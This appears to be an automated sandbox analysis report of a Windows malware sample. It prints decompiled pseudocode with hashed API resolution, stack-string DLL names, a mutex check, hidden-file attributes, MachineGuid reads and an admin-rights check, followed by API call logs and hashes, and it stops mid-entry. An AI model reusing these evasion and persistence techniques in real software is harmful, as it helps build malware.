                          				short _v74;
                          				char _v76;
                          				void* __ebx;
                          				void* __edi;
                          				void* _t38;
                          				short _t43;
                          				short _t44;
                          				short _t45;
                          				short _t46;
                          				short _t47;
                          				short _t48;
                          				short _t50;
                          				short _t51;
                          				short _t52;
                          				short _t54;
                          				short _t55;
                          				intOrPtr* _t57;
                          				intOrPtr* _t59;
                          				intOrPtr* _t61;
                          				void* _t63;
                          				WCHAR* _t65;
                          				long _t68;
                          				void* _t75;
                          				short _t76;
                          				short _t78;
                          				short _t83;
                          				short _t84;
                          				short _t85;
                          
                          				E00402C6C(_t38);
                          				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                          				SetErrorMode(3); // executed
                          				_t43 = 0x4f;
                          				_v76 = _t43;
                          				_t44 = 0x4c;
                          				_v74 = _t44;
                          				_t45 = 0x45;
                          				_v72 = _t45;
                          				_t46 = 0x41;
                          				_v70 = _t46;
                          				_t47 = 0x55;
                          				_v68 = _t47;
                          				_t48 = 0x54;
                          				_t76 = 0x33;
                          				_t84 = 0x32;
                          				_t83 = 0x2e;
                          				_t78 = 0x64;
                          				_t85 = 0x6c;
                          				_v66 = _t48;
                          				_v52 = 0;
                          				_t50 = 0x77;
                          				_v48 = _t50;
                          				_t51 = 0x73;
                          				_v46 = _t51;
                          				_t52 = 0x5f;
                          				_v42 = _t52;
                          				_v28 = 0;
                          				_t54 = 0x6f;
                          				_v24 = _t54;
                          				_t55 = 0x65;
                          				_v20 = _t55;
                          				_v64 = _t76;
                          				_v62 = _t84;
                          				_v60 = _t83;
                          				_v58 = _t78;
                          				_v56 = _t85;
                          				_v54 = _t85;
                          				_v44 = _t84;
                          				_v40 = _t76;
                          				_v38 = _t84;
                          				_v36 = _t83;
                          				_v34 = _t78;
                          				_v32 = _t85;
                          				_v30 = _t85;
                          				_v22 = _t85;
                          				_v18 = _t76;
                          				_v16 = _t84;
                          				_v14 = _t83;
                          				_v12 = _t78;
                          				_v10 = _t85;
                          				_v8 = _t85;
                          				_v6 = 0;
                          				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				 *_t57( &_v76);
                          				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				 *_t59( &_v48);
                          				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				_t81 =  &_v24;
                          				 *_t61( &_v24); // executed
                          				_t63 = E00414059(); // executed
                          				if(_t63 != 0) {
                          					_t65 = E00413D97(0);
                          					E004031E5(0, 0, 0xcf167df4, 0, 0);
                          					CreateMutexW(0, 1, _t65); // executed
                          					_t68 = GetLastError();
                          					_t92 = _t68 - 0xb7;
                          					if(_t68 == 0xb7) {
                          						E00413B81(0);
                          						_pop(_t81); // executed
                          					}
                          					E00413003(_t92); // executed
                          					E00412B2E(_t92); // executed
                          					E00412D31(_t81, _t84); // executed
                          					E00413B3F();
                          					E00413B81(0);
                          					 *0x49fdd0 = 1;
                          				}
                          				return 0;
                          			}































































                          0x0041386f
                          0x0041387e
                          0x00413885
                          0x00413889
                          0x0041388c
                          0x00413890
                          0x00413893
                          0x00413897
                          0x0041389a
                          0x0041389e
                          0x004138a1
                          0x004138a5
                          0x004138a8
                          0x004138ac
                          0x004138af
                          0x004138b2
                          0x004138b5
                          0x004138b8
                          0x004138bb
                          0x004138bc
                          0x004138c4
                          0x004138c8
                          0x004138cb
                          0x004138cf
                          0x004138d2
                          0x004138d6
                          0x004138d7
                          0x004138df
                          0x004138e3
                          0x004138e4
                          0x004138ea
                          0x004138eb
                          0x004138f1
                          0x004138f5
                          0x004138f9
                          0x004138fd
                          0x00413901
                          0x00413905
                          0x00413909
                          0x0041390d
                          0x00413911
                          0x00413915
                          0x00413919
                          0x0041391d
                          0x00413921
                          0x00413925
                          0x00413929
                          0x0041392d
                          0x00413931
                          0x00413935
                          0x00413939
                          0x0041393d
                          0x00413941
                          0x00413950
                          0x00413959
                          0x0041395f
                          0x00413968
                          0x0041396e
                          0x00413973
                          0x00413977
                          0x00413979
                          0x00413980
                          0x00413982
                          0x00413991
                          0x0041399c
                          0x0041399e
                          0x004139a4
                          0x004139a9
                          0x004139ac
                          0x004139b1
                          0x004139b1
                          0x004139b2
                          0x004139b7
                          0x004139bc
                          0x004139c1
                          0x004139c7
                          0x004139cd
                          0x004139cd
                          0x004139db

                          APIs
                          • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                          • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                          • GetLastError.KERNEL32 ref: 0041399E
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Error$CreateLastModeMutex
                          • String ID:
                          • API String ID: 3448925889-0
                          • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                          • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                          				long _v8;
                          				void* _t7;
                          				long _t10;
                          				void* _t21;
                          				struct _OVERLAPPED* _t24;
                          
                          				_t14 = __ebx;
                          				_t24 = 0;
                          				_v8 = 0;
                          				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                          				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                          				_t21 = _t7;
                          				if(_t21 != 0xffffffff) {
                          					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                          					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                          					if(_t10 != 0xffffffff) {
                          						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                          						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                          						_t24 =  !=  ? 1 : 0;
                          					}
                          					E00403C40(_t21); // executed
                          				}
                          				return _t24;
                          			}








                          0x004042cf
                          0x004042d5
                          0x004042df
                          0x004042e2
                          0x004042f9
                          0x004042fb
                          0x00404300
                          0x0040430a
                          0x00404314
                          0x00404319
                          0x00404323
                          0x00404334
                          0x0040433b
                          0x0040433b
                          0x0040433f
                          0x00404344
                          0x0040434c

                          APIs
                          • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                          • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: File$CreatePointerWrite
                          • String ID:
                          • API String ID: 3672724799-0
                          • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                          • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040632F() {
                          				char _v8;
                          				void* _t4;
                          				void* _t7;
                          				void* _t16;
                          
                          				_t16 = E00402B7C(0x208);
                          				if(_t16 == 0) {
                          					L4:
                          					_t4 = 0;
                          				} else {
                          					E0040338C(_t16, 0, 0x104);
                          					_t1 =  &_v8; // 0x4143e8
                          					_v8 = 0x208;
                          					_t7 = E00406069(_t16, _t1); // executed
                          					if(_t7 == 0) {
                          						E00402BAB(_t16);
                          						goto L4;
                          					} else {
                          						_t4 = _t16;
                          					}
                          				}
                          				return _t4;
                          			}







                          0x00406340
                          0x00406345
                          0x00406373
                          0x00406373
                          0x00406347
                          0x0040634f
                          0x00406354
                          0x00406357
                          0x0040635c
                          0x00406366
                          0x0040636d
                          0x00000000
                          0x00406368
                          0x00406368
                          0x00406368
                          0x00406366
                          0x0040637a

                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • _wmemset.LIBCMT ref: 0040634F
                            • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser_wmemset
                          • String ID: CA
                          • API String ID: 2078537776-1052703068
                          • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                          • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                          • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                          • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                          				int _t7;
                          				void* _t8;
                          
                          				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                          				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                          				return _t7;
                          			}





                          0x00406094
                          0x004060a8
                          0x004060ab

                          APIs
                          • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: InformationToken
                          • String ID: IDA
                          • API String ID: 4114910276-365204570
                          • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                          • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                          				_Unknown_base(*)()* _t5;
                          				void* _t6;
                          
                          				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                          				_t1 =  &_a8; // 0x403173
                          				_t5 = GetProcAddress(_a4,  *_t1); // executed
                          				return _t5;
                          			}





                          0x00402c10
                          0x00402c15
                          0x00402c1b
                          0x00402c1e

                          APIs
                          • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: AddressProc
                          • String ID: s1@
                          • API String ID: 190572456-427247929
                          • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                          • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E00404A52(void* _a4, char* _a8, char* _a12) {
                          				void* _v8;
                          				int _v12;
                          				void* __ebx;
                          				char* _t10;
                          				long _t13;
                          				char* _t27;
                          
                          				_push(_t21);
                          				_t27 = E00402B7C(0x208);
                          				if(_t27 == 0) {
                          					L4:
                          					_t10 = 0;
                          				} else {
                          					E00402B4E(_t27, 0, 0x208);
                          					_v12 = 0x208;
                          					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                          					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                          					if(_t13 != 0) {
                          						E00402BAB(_t27);
                          						goto L4;
                          					} else {
                          						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                          						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                          						E00404A39(_v8); // executed
                          						_t10 = _t27;
                          					}
                          				}
                          				return _t10;
                          			}









                          0x00404a56
                          0x00404a65
                          0x00404a6a
                          0x00404ad1
                          0x00404ad1
                          0x00404a6c
                          0x00404a71
                          0x00404a79
                          0x00404a85
                          0x00404a9a
                          0x00404a9e
                          0x00404acb
                          0x00000000
                          0x00404aa0
                          0x00404aac
                          0x00404abc
                          0x00404ac1
                          0x00404ac6
                          0x00404ac6
                          0x00404a9e
                          0x00404ad9

                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                          • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateOpenProcessQueryValue
                          • String ID:
                          • API String ID: 1425999871-0
                          • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                          • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                          • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                          • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 40%
                          			E004060BD(void* __eflags) {
                          				signed int _v8;
                          				char _v12;
                          				short _v16;
                          				char _v20;
                          				void* __ebx;
                          				intOrPtr* _t12;
                          				signed int _t13;
                          				intOrPtr* _t14;
                          				signed int _t15;
                          				void* _t24;
                          
                          				_v16 = 0x500;
                          				_v20 = 0;
                          				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                          				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                          				_v8 = _t13;
                          				if(_t13 != 0) {
                          					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                          					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                          					asm("sbb eax, eax");
                          					_v8 = _v8 &  ~_t15;
                          					E0040604F(_v12);
                          					return _v8;
                          				}
                          				return _t13;
                          			}













                          0x004060c6
                          0x004060d5
                          0x004060d8
                          0x004060f4
                          0x004060f6
                          0x004060fb
                          0x0040610a
                          0x00406115
                          0x0040611c
                          0x0040611e
                          0x00406121
                          0x00000000
                          0x0040612a
                          0x0040612f

                          APIs
                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: CheckMembershipToken
                          • String ID:
                          • API String ID: 1351025785-0
                          • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                          • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                          				void* _t3;
                          				int _t5;
                          
                          				_t3 = E00403D4D(__eflags, _a4); // executed
                          				if(_t3 == 0) {
                          					__eflags = 0;
                          					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                          					_t5 = CreateDirectoryW(_a4, 0); // executed
                          					return _t5;
                          				} else {
                          					return 1;
                          				}
                          			}





                          0x00403c68
                          0x00403c70
                          0x00403c78
                          0x00403c82
                          0x00403c8b
                          0x00403c8f
                          0x00403c72
                          0x00403c76
                          0x00403c76

                          APIs
                          • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: CreateDirectory
                          • String ID:
                          • API String ID: 4241100979-0
                          • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                          • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E0040642C(void* __eflags) {
                          				short _v40;
                          				intOrPtr* _t6;
                          				void* _t10;
                          
                          				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                          				 *_t6( &_v40); // executed
                          				return 0 | _v40 == 0x00000009;
                          			}






                          0x0040643c
                          0x00406445
                          0x00406454

                          APIs
                          • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: InfoNativeSystem
                          • String ID:
                          • API String ID: 1721193555-0
                          • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                          • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                          				int _t6;
                          				void* _t7;
                          
                          				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                          				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                          				return _t6;
                          			}





                          0x00403bdd
                          0x00403beb
                          0x00403bee

                          APIs
                          • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: FileMove
                          • String ID:
                          • API String ID: 3562171763-0
                          • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                          • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0
                          • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                          • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040427D(WCHAR* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                          				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                          				return _t4;
                          			}





                          0x0040428a
                          0x00404297
                          0x0040429a

                          APIs
                          • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                          • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                          • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                          • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00404A19(void* _a4, short* _a8, void** _a12) {
                          				long _t5;
                          				void* _t6;
                          
                          				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                          				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                          				return _t5;
                          			}





                          0x00404a27
                          0x00404a35
                          0x00404a38

                          APIs
                          • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                          • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                          • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                          • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403C40(void* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                          				_t4 = FindCloseChangeNotification(_a4); // executed
                          				return _t4;
                          			}





                          0x00403c4d
                          0x00403c55
                          0x00403c58

                          APIs
                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                          • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
